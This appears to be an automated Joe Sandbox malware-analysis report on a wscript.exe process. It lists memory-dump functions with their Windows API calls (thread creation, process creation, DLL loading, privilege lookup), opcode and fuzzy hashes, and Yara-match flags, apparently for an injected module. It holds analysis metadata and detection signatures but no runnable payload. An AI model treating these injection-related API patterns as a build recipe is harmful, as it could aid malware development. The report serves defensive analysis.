                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                      • String ID: .z`
                                                                                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                                                                                      • Opcode ID: 5bca1434af71235a765000b781c50ed5c4bf131192a700c4342c6be7842671a9
                                                                                                                                                                                                                      • Instruction ID: 9350811f43a986cdfa35a13eca46d04079c779f4db249b393d55c75ecbed873c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5bca1434af71235a765000b781c50ed5c4bf131192a700c4342c6be7842671a9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41F039B2261204ABD718EF58DC49EE777A9FF48760F118669FA485B242D631E811CBA0
                                                                                                                                                                                                                      Function 02A1A640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 559 2a1a640-2a1a656 560 2a1a65c-2a1a671 RtlFreeHeap 559->560 561 2a1a657 call 2a1af30 559->561 561->560
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A03AF8), ref: 02A1A66D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                      • String ID: .z`
                                                                                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                                      • Instruction ID: f2d9ccffe0fccf8c4c201a3cdc43543083b2810646007827f85b3880d96adb1e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39E04FB12102046BD718DF59CC44EA777ADEF88760F014555FD0857241C630F910CAF0
                                                                                                                                                                                                                      Function 02A08310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A0836A
                                                                                                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A0838B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                                                                                      • Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                                                                                                                                                                                                      • Instruction ID: 93b7ceeefc38d2aff9f43169678d703b0c8750f358bf7e01b239453311cb5523
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D001A731AC03287BE720A6949D42FFE776D5B40F54F050155FF04BA1C1EAA469054AF6
                                                                                                                                                                                                                      Function 02A0ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A0AD62
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                                                                                      • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                                                      • Instruction ID: d8af500083ecab089230966dbbde17503c719f2e01fddf9d3af7a74bdc4a3304
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D011EB5D4020DBBDF10EBA4ED81F9DB7799B54318F0045A5AA0997281FA31EB14CB91
                                                                                                                                                                                                                      Function 02A1A791 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0F1D2,02A0F1D2,?,00000000,?,?), ref: 02A1A7D0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                                                                                      • Opcode ID: 3cbd036db815f1a6f831822f4f400f7b7e145f9e35e5d4bf65d90379d78bfa16
                                                                                                                                                                                                                      • Instruction ID: ccfec40cda3c2bc87b335fcd0d4ae402c6e984412d19a1da729fc25fc9993fb5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cbd036db815f1a6f831822f4f400f7b7e145f9e35e5d4bf65d90379d78bfa16
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D901ADF6210208ABDB14EF58DC80DEB73ADEF88324F018459F90957202CA30E915CAB5
                                                                                                                                                                                                                      Function 02A1A6B0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A1A704
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                                                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                                      • Instruction ID: 01072a70c8e6071c45f56c2d96cbd7219d5706d5ee6895d0fe177b5bc151aea8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9901B2B2211108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                                                                                                                                      Function 02A19180 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A0F050,?,?,00000000), ref: 02A191BC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                      • Opcode ID: 3ca6a205792d7ef5e9bf1524afc8b1dc678e378c6025c1e3997efacd26045c0b
                                                                                                                                                                                                                      • Instruction ID: 3e00dca6d65e1f296e50fe66dd9d656ca184077a337c406b1970f1fd55558565
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca6a205792d7ef5e9bf1524afc8b1dc678e378c6025c1e3997efacd26045c0b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EFE065773803043AE72066A9AC02FA7B29D8B81B70F14002AFA0DEA2C0D995F84146A8
                                                                                                                                                                                                                      Function 02A19176 Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A0F050,?,?,00000000), ref: 02A191BC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                      • Opcode ID: 7d55885de893406a9c509f9c0cc846aa32c5beb93765153f0fb1aa7fc83bd92f
                                                                                                                                                                                                                      • Instruction ID: 1eefe9de5dbd4689167969a38adedda9385bd43f6833c2c188930a3fa9962aa9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d55885de893406a9c509f9c0cc846aa32c5beb93765153f0fb1aa7fc83bd92f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0927B3C13003AE7306658AD03FA777A98B95B20F15051AFA5DAF2C1DDA4B4418AA9
                                                                                                                                                                                                                      Function 02A1A600 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(02A14536,?,02A14CAF,02A14CAF,?,02A14536,?,?,?,?,?,00000000,00000000,?), ref: 02A1A62D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                                      • Instruction ID: 4c4884c880b492ad390b963a8afe7fb5b6bab628ab2fcba4309ebbec121c16e8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86E04FB1211204ABD714DF59CC40EA777ADEF88764F114559FE085B241C530F911CBF0
                                                                                                                                                                                                                      Function 02A1A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0F1D2,02A0F1D2,?,00000000,?,?), ref: 02A1A7D0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                                      • Instruction ID: da41987a4f4b53f4762b4011ead12b43a2a6f191dcc498e2b2bc2aeb149733f2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50E01AB12102086BDB14DF49CC84EE737ADAF88660F018155BA0857241C930E811CBF5
                                                                                                                                                                                                                      Function 02A0F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,02A08D14,?), ref: 02A0F6FB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                                                      • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                                                      • Instruction ID: ee2128cd1e0e9dd152a08002d14892792849c3c285f8400a7c26e5faa67f2067
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83D05E656903082AE610AAA89C42F6632895B44B14F490064F948EA2C3DD50E0004565
                                                                                                                                                                                                                      Function 02A0ACE3 Relevance: 1.5, APIs: 1, Instructions: 11libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A0AD62
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                                                                                      • Opcode ID: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                                                      • Instruction ID: 6817982aa892f2c1b6b807f051e65ff56b999eb2d1831302aa1594f2ff564385
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38B09231E946182BEA74C7D8AC86B2AB754D785716F144285BE2CA62C0E9A2291041E5
                                                                                                                                                                                                                      Function 04AD2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 9298986b293480d18a86dd5210d6560540a842b29dc3be253fd07484b1fce225
                                                                                                                                                                                                                      • Instruction ID: 8a6f0930558d687ddaf837d0e118da86d119c3b0b450292b88b7ffb4b95be9ac
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9298986b293480d18a86dd5210d6560540a842b29dc3be253fd07484b1fce225
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DB09B729015C5C5FB11F760460871779006BD0705F56C075D2130741E473CD5D1F175

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 0059544C Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 326librarystringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,00000000), ref: 00595471
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,20000070,00000000,00000002,?,?,00000000), ref: 0059548F
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00000104,?,?,00000000), ref: 005954F6
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059551C
                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000000), ref: 00595535
                                                                                                                                                                                                                      • LoadStringA.USER32(000003E9,?,00000104), ref: 0059556F
                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,00000000), ref: 005955A7
                                                                                                                                                                                                                      • CharNextA.USER32(?,?,?,?,?,00000000), ref: 005955C8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00595606
                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 00595620
                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060,?,?,?,?,00000000), ref: 00595635
                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060,?,?,?,?,00000000), ref: 0059564F
                                                                                                                                                                                                                      • sprintf_s.MSVCRT ref: 00595692
                                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 005956B6
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 005956F4
                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0059570E
                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 00595721
                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 0059573B
                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,?,00000000), ref: 0059574B
                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,?,?,00000000), ref: 00595764
                                                                                                                                                                                                                      • sprintf_s.MSVCRT ref: 0059578A
                                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 005957AE
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 005957EC
                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 00595804
                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 00595817
                                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 0059582D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$CharInfoLocaleNextmemcpystrcpy_s$DefaultFileModuleNameUsersprintf_s$FreeString
                                                                                                                                                                                                                      • String ID: %s%s.DLL
                                                                                                                                                                                                                      • API String ID: 2133840635-4110387156
                                                                                                                                                                                                                      • Opcode ID: 37653d8424be2ae8440e790b3045ceebf3f2fc952c3e384264eca51423ad85e3
                                                                                                                                                                                                                      • Instruction ID: 5785c2745b7d53692284aab876379ea07ebd09f5962aa90949f06656af4b1123
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37653d8424be2ae8440e790b3045ceebf3f2fc952c3e384264eca51423ad85e3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21B1D67290061DABDF22DB64CC49BEA7BBDFF19700F050496E509E3141FA359A58DBA0
                                                                                                                                                                                                                      Function 0058B52D Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 110memorywindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,h+Y,00000000,00000000,00000104,?,?,00000000,00000000,?,00592B68,?), ref: 0058B55A
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000016,?,00592B68,?), ref: 0058B56B
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00592B68,?), ref: 0058B578
                                                                                                                                                                                                                      • swprintf_s.MSVCRT ref: 0058B59F
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(000011FF,00000000,00000000,00000000,?,00000000,00000000,00000104,?,?,00000000,00000000,?,00592B68,?), ref: 0058B5B6
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,0000000B,?,00592B68,?), ref: 0058B5C3
                                                                                                                                                                                                                      • sprintf_s.MSVCRT ref: 0058B5D9
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00592B68,?), ref: 0058B5EB
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,?,00592B68,?), ref: 0058B5FC
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00592B68,?), ref: 0058B616
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(h+Y), ref: 0058B627
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00592B68), ref: 0058B638
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 0058B647
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide$ErrorLastStringsprintf_sswprintf_s
                                                                                                                                                                                                                      • String ID: 0x%8X$0x%8X$h+Y$h+Y
                                                                                                                                                                                                                      • API String ID: 1583499379-204340514
                                                                                                                                                                                                                      • Opcode ID: af133197ef827634d1655eb5cab2659cd294ff925931841abcff15321e1b4797
                                                                                                                                                                                                                      • Instruction ID: e05d0cb4819cd66c8a77036937e7ee56d7aa5376425993bf3570dba15b2f377d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af133197ef827634d1655eb5cab2659cd294ff925931841abcff15321e1b4797
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5631AE31901226FBEB216BAA9C0CEEF7E7CFF55761F15015AB811F1190EB708A04E7A4
                                                                                                                                                                                                                      Function 0058B8C3 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 179registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00595846: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 00595873
                                                                                                                                                                                                                        • Part of subcall function 00595846: WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74), ref: 0059589D
                                                                                                                                                                                                                        • Part of subcall function 00595846: GetLastError.KERNEL32(?,00000000,00000000,00000000,?,0058BB74,?,00000000,?,00000000,?,?,?,00588FB7,00000000,00000000), ref: 005958AA
                                                                                                                                                                                                                        • Part of subcall function 00595846: __alloca_probe_16.LIBCMT ref: 005958B4
                                                                                                                                                                                                                        • Part of subcall function 00595846: WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,0058BB74,?,00000000,?,00000000), ref: 005958C8
                                                                                                                                                                                                                        • Part of subcall function 00595846: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00588FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,0058BB74,?,00000000,?,00000000), ref: 005958DF
                                                                                                                                                                                                                      • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 0058B9C5
                                                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,00000100), ref: 0058B9E7
                                                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0058BA16
                                                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 0058BA7E
                                                                                                                                                                                                                      • ReportEventW.ADVAPI32(?,00000008,00000000,00FF03E9,00000000,00000001,00000000,?,00000000), ref: 0058BAE5
                                                                                                                                                                                                                      • DeregisterEventSource.ADVAPI32(?), ref: 0058BAF1
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0058BB0E
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000), ref: 0058BB26
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000), ref: 0058BB3B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EventName$AccountByteCharCloseLookupMultiOpenSourceWide$DeregisterErrorFreeLastRegisterReportStringUser__alloca_probe_16
                                                                                                                                                                                                                      • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                                                                                                                                                                                                      • API String ID: 1647329903-2261343319
